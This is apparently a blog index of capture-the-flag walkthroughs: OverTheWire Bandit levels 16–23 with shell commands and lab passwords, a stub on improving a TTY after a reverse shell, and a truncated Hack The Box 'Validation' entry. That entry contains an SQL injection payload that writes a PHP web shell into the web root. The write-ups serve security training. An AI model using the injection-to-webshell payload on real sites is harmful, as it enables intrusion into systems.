Bandit CTF – Level 23

Level 22 -> 23
bandit22@bandit:~$ cd /etc/cron.d
bandit22@bandit:/etc/cron.d$ ls
bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
bandit22@bandit:/etc/cron.d$ whoami
bandit22@bandit:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
password = jc1uXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 22

Level 21 -> 22
bandit21@bandit:/etc/cron.d$ ls
bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh
bandit21@bandit:/tmp$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Password = Yk7oXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 21

Level 20 -> 21
bandit20@bandit:~$ ./suconnect
bandit20@bandit:~$ echo "GbKksEFF4yrVs6il55v6gwY5aVje5f0j" | nc -l localhost -p 8080
From other session:
bandit20@bandit:~$ ./suconnect 8080
Password = gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr

Bandit CTF – Level 20

Level 19 -> 20
bandit19@bandit:~$ ls -la
bandit19@bandit:~$ ./bandit20-do
bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
Password = GbKkXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 19

Level 18 -> 19
$ man ssh
$ ssh bandit18@bandit.labs.overthewire.org -p 2220 -t "ls -la"
$ ssh bandit18@bandit.labs.overthewire.org -p 2220 -t "cat ~/readme"
Password = IuekXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 18

Level 17 -> 18
$ ssh -i bandit17.key bandit17@bandit.labs.overthewire.org -p 2220
bandit17@bandit:~$ diff passwords.new passwords.old
password = kfBfXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 17

Level 16 -> 17
bandit16@bandit:~$ echo "cluFn7wTiGryunymYOu4RcffSxQluehd" | openssl s_client -connect localhost:31790 -ign_eof
Now we can save the private key as bandit17.key

How to improve our TTY

Once we get a reverse shell, we usually need to improve the TTY. Here are some tips for doing it:

HTB Validation

$ nmap -p- -v 10.10.11.116
Access to http://10.10.11.116
The listbox values are sent to the server in a POST request: username=rffuste&country=Brazil
In the response, we get a cookie named user. This user cookie does not change if multiple requests are performed.
SQL Injection
We can check if there is an SQL Injection. We have confirmed there is an SQL Injection that we can use.
' union select "" INTO OUTFILE '/var/www/html/shell.php'-- -
Now

Bandit CTF Level 16

Level 15 -> 16
bandit15@bandit:~$ echo "BfMYroe26WYalil77FoDi9qh59eK5xNr" | openssl s_client -connect localhost:30001 -ign_eof
password = cluFXXXXXXXXXXXXXXXXXXXXXXXXXXXX